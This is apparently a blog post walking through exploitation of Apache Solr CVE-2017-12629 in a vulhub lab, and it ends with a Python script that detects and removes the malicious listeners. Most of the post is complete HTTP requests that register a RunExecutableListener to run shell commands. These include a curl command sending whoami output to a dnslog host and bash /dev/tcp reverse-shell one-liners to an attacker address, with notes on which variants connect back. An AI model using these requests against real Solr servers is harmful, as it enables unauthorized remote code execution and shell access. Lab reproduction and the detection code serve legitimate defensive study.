[vulhub] Reproduction of the Apache Solr remote command execution vulnerability (CVE-2017-12629)

Fingerprint

Visit port 8983 to reach the Apache Solr administration page without logging in (the port may have been changed).
The page title is "Solr Admin", and the icon looks a bit like a red flower.

Affected versions

Apache Solr 5.5.0 to 7.0.1

Exploitation

Before version 7.1.0 there were two vulnerabilities: an XML external entity (XXE) vulnerability and a remote command execution (RCE) vulnerability. They can be chained together, and both are tracked under CVE-2017-12629.

https://paper.seebug.org/425/

Here I followed the official vulhub documentation: first create a listener, then send an update. The update fires the listener that was just added, which in turn executes the command we want.

Notes:

1. In my testing, a listener can only be used once, so change the name every time!

2. The update triggers all listeners! Existing listeners are therefore triggered as well. In my tests here, not too many listeners could be created or the instance would crash; I don't know whether my memory allocation is too small.

First, create a listener. The value of exe is the executable to run, dir is the directory it lives in, and args holds its arguments (here sh -c followed by the command we want to execute):

POST /solr/demo/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}


What happens if we send the request again with the same name value?
You can see that reusing the name value immediately returns an error, and the listener is not created!

Then perform the update operation to trigger the listener just added.
This request only executes the listeners that have not been triggered yet!

POST /solr/demo/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]


In the listener request shown in the screenshot above, I created a file named b1, so let's go and have a look.
Successfully executed!

Note: after the update operation the command executes with a slight delay. Please wait patiently for 20 seconds or more.

Now that the exploit works, let's verify it with a simpler method: DNSlog validation!

The procedure is the same as above: change the name value and change the command to

curl `whoami`.jxodqu.dnslog.cn
POST /solr/demo/config HTTP/1.1
Host: 192.168.100.34:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 161

{"add-listener":{"event":"postCommit","name":"b2","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "curl `whoami`.jxodqu.dnslog.cn"]}}

Then send the update to trigger the listener.
The DNS query then shows up in dnslog!

Reverse shell

First start listening on the attacking machine.

Then create a listener. Change the name value (to b3) and the command to execute:

bash -i >& /dev/tcp/192.168.100.34/9090 0>&1

Be careful:

1. Variants I tested:
  1.0 Both sides bash, using bash -i >& /dev/tcp/192.168.100.34/9090 0>&1: the shell connects back.
  1.1 Both sides sh, using sh -i >& /dev/udp/192.168.100.34/1111 0>&1: no connection.
  1.2 Both sides /bin/bash, using /bin/bash -i > /dev/tcp/192.168.100.34/1111 0<& 2>&1: no connection.
  From the above, 1.0 connects back successfully, so use 1.0.

2. Linux generally uses bash by default, but our request uses sh, so to get the reverse shell you must change sh to bash.



Reverse shell obtained successfully.

Summary

1. Only commands passed directly to Java's Runtime function need to be encoded. Here the solr.RunExecutableListener class is used instead.

2. The shell on both sides should be the same!
Both sides bash:
use bash -i >& /dev/tcp/192.168.100.34/1111 0>&1
and the shell connects back.
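Each add-listener request above persists the listener in the core's configoverlay.json, which is also what GET /solr/<core>/config/overlay returns, so the same artifact that makes the exploit survive restarts also makes it detectable. The check below is an added example for this write-up, not code from the original post or from the Solr project: it reads an overlay, flags every listener whose class is solr.RunExecutableListener, and emits the matching delete-listener Config API bodies. The sample overlay is constructed; its layout (listeners keyed by name under "listener") is an assumption about the on-disk format, so the parser also accepts a plain list of listener objects and the API response wrapper.

```python
"""Flag RunExecutableListener entries in a Solr configoverlay.json.

Added example for this write-up, not code from the post or the Solr project.
The sample overlay is constructed; its exact layout is an assumption.
"""
import json

DANGEROUS_CLASSES = {
    "solr.RunExecutableListener",
    "org.apache.solr.core.RunExecutableListener",
}

# Constructed sample resembling what the add-listener requests above leave behind,
# plus one benign warming listener that must not be flagged.
SAMPLE_OVERLAY = json.dumps({
    "listener": {
        "newlistener": {"event": "postCommit", "class": "solr.RunExecutableListener",
                        "exe": "sh", "dir": "/bin/", "args": ["-c", "touch /tmp/success"]},
        "b3": {"event": "postCommit", "class": "solr.RunExecutableListener",
               "exe": "bash", "dir": "/bin/",
               "args": ["-c", "bash -i >& /dev/tcp/192.168.100.34/9090 0>&1"]},
        "warm": {"event": "newSearcher", "class": "solr.QuerySenderListener"},
    }
})


def _iter_listeners(overlay):
    """Yield (name, entry) pairs from either a name-keyed object or a list."""
    listeners = overlay.get("listener", {})
    if isinstance(listeners, dict):
        for name, entry in listeners.items():
            yield entry.get("name", name), entry
    else:
        for entry in listeners:
            yield entry.get("name"), entry


def find_executable_listeners(overlay_text):
    """Return [(name, event, command)] for every RunExecutableListener found.

    Accepts the raw overlay document or the /config/overlay API response,
    which wraps it under an "overlay" key.
    """
    overlay = json.loads(overlay_text)
    if "overlay" in overlay and isinstance(overlay["overlay"], dict):
        overlay = overlay["overlay"]
    hits = []
    for name, entry in _iter_listeners(overlay):
        if entry.get("class") in DANGEROUS_CLASSES:
            parts = [entry.get("exe", "")] + list(entry.get("args", []))
            hits.append((name, entry.get("event"), " ".join(parts).strip()))
    return hits


def removal_commands(hits):
    """Config API bodies that remove each flagged listener by name.

    delete-listener is the Config API counterpart of add-listener; POST each
    body to /solr/<core>/config to remove the entry from the overlay.
    """
    return [json.dumps({"delete-listener": name}) for name, _, _ in hits]


if __name__ == "__main__":
    for name, event, cmd in find_executable_listeners(SAMPLE_OVERLAY):
        print(f"[!] listener {name!r} on {event}: {cmd}")
    for body in removal_commands(find_executable_listeners(SAMPLE_OVERLAY)):
        print("remove with:", body)
```

Run it against a live core by feeding it the output of curl http://your-ip:8983/solr/demo/config/overlay; the fix that actually closes the hole is upgrading to a Solr release that no longer ships RunExecutableListener, and the admin UI and Config API should never be reachable without authentication.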

Tags: Apache solr vulhub

Posted on Fri, 17 Sep 2021 18:29:46 -0400 by jcampbell1